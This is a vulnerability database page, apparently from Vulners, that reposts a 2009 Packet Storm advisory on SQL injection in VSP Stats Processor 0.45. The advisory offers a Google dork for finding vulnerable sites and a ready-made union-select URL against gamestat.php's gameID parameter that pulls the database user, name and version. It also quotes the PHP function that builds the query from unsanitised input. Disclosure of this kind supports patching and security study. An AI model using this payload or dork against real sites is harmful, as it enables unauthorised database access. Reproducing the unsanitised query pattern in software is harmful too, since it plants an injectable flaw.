Lucene search
K

VSP Stats Processor 0.45 SQL Injection

🗓️ 01 Apr 2009 00:00:00Reported by Dimi4Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

VSP Stats Processor 0.45 SQL Injection vulnerability foun

Code
`########################################  
# #  
# Product : vsp stats processor #  
# Version : all #  
# Dork : "powered by vsp stats processor" #  
# Site: http://www.scivox.net/vsp/ #  
# Found by: Dimi4 #  
# Date : 31.03.09 #  
# Greetz: antichat #  
# #  
########################################  
  
SQL-injection  
[+] URL: http://target.com/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x203a20,user(),database(),version()),2/*&config=cfg-default.php  
[+] Output: <option> {DATA} </option>  
  
Bug Function: (vsp-core\pub\themes\bismarck\gamestat.php 540-558 lines)  
  
function getStatsGame()  
{  
global $db;  
global $ggame;  
$sql = "select name, value  
from {$GLOBALS['cfg']['db']['table_prefix']}gamedata  
where gameID=$GLOBALS[gameID]  
";  
  
//echo $sql;  
$rs = $db->Execute($sql);  
  
.....  
}  
  
  
(c) Dimi4, 2009 greetz to antichat  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Apr 2009 00:00Current
0.6Low risk
Vulners AI Score0.6
27